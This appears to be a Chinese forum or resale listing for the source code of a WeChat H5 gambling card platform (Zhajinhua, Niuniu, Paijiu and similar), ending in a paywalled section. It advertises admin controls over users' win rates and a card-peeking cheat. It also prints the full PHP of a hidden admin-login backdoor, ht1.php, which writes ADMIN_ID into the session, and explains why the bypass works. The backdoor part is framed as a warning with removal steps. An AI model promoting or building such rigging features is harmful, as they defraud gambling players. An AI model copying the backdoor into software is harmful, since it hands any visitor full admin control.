支持炸金花、二八杠、牌九、三公、赖子牛牛、斗牛,优化了一下无限回调接口
这是一套微信内运行的 H5 棋牌/对战平台,属于「神兽」系 H5 棋牌源码的转售变体。Web 端负责大厅、房间、后台、支付;房间内的实时对战由独立的 PHP 常驻进程(Workerman)通过 WebSocket 承载。
后台可以控制用户胜率、透视功能【后门文件全部已经解密,可以放心学习,代码全部明文】
后台免密登录后门app/js/ht1.php · admin/themes/simplebootx/Api/ht1.php文件特征两个文件内容完全一致,各 142 字节
<?php
session_start();
$_SESSION["ADMIN_ID"]=1; // ← 直接把自己写成管理员
$url = "http://". $_SERVER['HTTP_HOST']."/Admin/Index/index";
header("location:$url");
为何有效后台基类 application/Admin/Controller/AdminbaseController.class.php 第 34–41 行的鉴权逻辑是:
读取 session('ADMIN_ID') → 非空即视为已登录 → 用该 ID 查管理员 → 通过校验
ht1.php 用原生 $_SESSION 写入同一个 key,与 ThinkPHP 的 session 封装完全兼容危害任何人只要访问一次 你的域名/app/js/ht1.php,就会被 302 送进后台首页,拿到超级管理员权限(可改站点、看全站用户资料、改赔率、导出数据)
典型的「作者留一手」。文件名叫 ht1.php,藏在 JS 目录和后台模板目录里,不做审计基本发现不了。必须直接删除。
后门文件加密的app\files\js
清理数据库中的植入内容
-- 1. 清掉被塞了外链的邮件模板
UPDATE jz_options SET option_value='' WHERE option_name='member_email_active';
-- 2. 删除厂商隐藏路由
DELETE FROM jz_route WHERE route LIKE '%5e1e5cb1d3841476ceb279da1db2e905%';
-- 3. 确认没有残留的前运营方域名(应为 0 行)
SELECT COUNT(*) FROM jz_room WHERE dwz LIKE '%zuilovexr%' OR dwz LIKE '%yaayam%'
OR dwz LIKE '%decadeleader%' OR dwz LIKE '%dianwujy%' OR dwz LIKE '%cgbdh%'
OR dwz LIKE '%sixnp%' OR dwz LIKE '%pinche.site%';
ThinkPHP框架想升级的可以自行学习研究
大厅入口
大厅地址: http://你的域名/ (走 ThinkCMF 路由,非微信会跳 BrowserLogin)
备用大厅: http://你的域名/dh
后台: http://你的域名/admin
此处内容已隐藏,高级黄钻可见
请登录后查看特权








